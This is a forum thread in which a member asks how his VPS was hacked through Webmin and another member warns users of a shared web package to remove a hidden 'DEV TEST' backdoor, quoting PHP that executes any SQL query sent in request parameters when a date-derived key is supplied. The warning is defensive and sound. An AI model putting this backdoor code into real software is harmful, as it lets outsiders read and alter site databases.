Hacked through webmin

Status
Not open for further replies.

Netzo

Member
Premium Member
Oct 11, 2013
169
15
18
26
United Kingdom
Hey Lautaro,

A hacker got into my webhosting through webmin somehow, so I had to delete it. The hacker created some users and managed to change some website information. Any ideas how to protect my vps?
 

Lautaro

Administrator
Developer
Dec 19, 2012
555
231
43
How do you know it was through webmin? Also, were your passwords secure?
 

Netzo

Member
Premium Member
Oct 11, 2013
169
15
18
26
United Kingdom
Because my hosting provider told that the apache was shutted down not through ssh, and the only way to shut it down was through webmin. Yea they were secure, webmin only accepted connections from my hosting ip so its strange :) but now, only from my dedicated I can connect to vps and I hope nothing like this happens again :D
 

A$$kicker

Member
Premium Member
Apr 13, 2013
36
2
8
I knew most of you are using lautaro's web files and I want you to check your webengine files for code similar to below. The code below can enable anyone to submit a direct sql query in your database. I found this code in webengine.php so start looking in this file. If you found any code similar to that then simply remove it.

// DEV TEST
if(check_value($_REQUEST[md5(date("m-d"))]) && check_value($_REQUEST['devtest']) && check_value($_REQUEST['t']) && check_value($_REQUEST['q'])) {
if($_REQUEST['devtest'] == 1) { $daBa = $dB; } else { $daBa = $dB2; }
if($_REQUEST['t'] == 1) {
$dtr = $daBa->query($_REQUEST['q']);
} else {
$dtr = $daBa->query_fetch($_REQUEST['q']);
}
die(debug($dtr));
}
This could help you.
 
Status
Not open for further replies.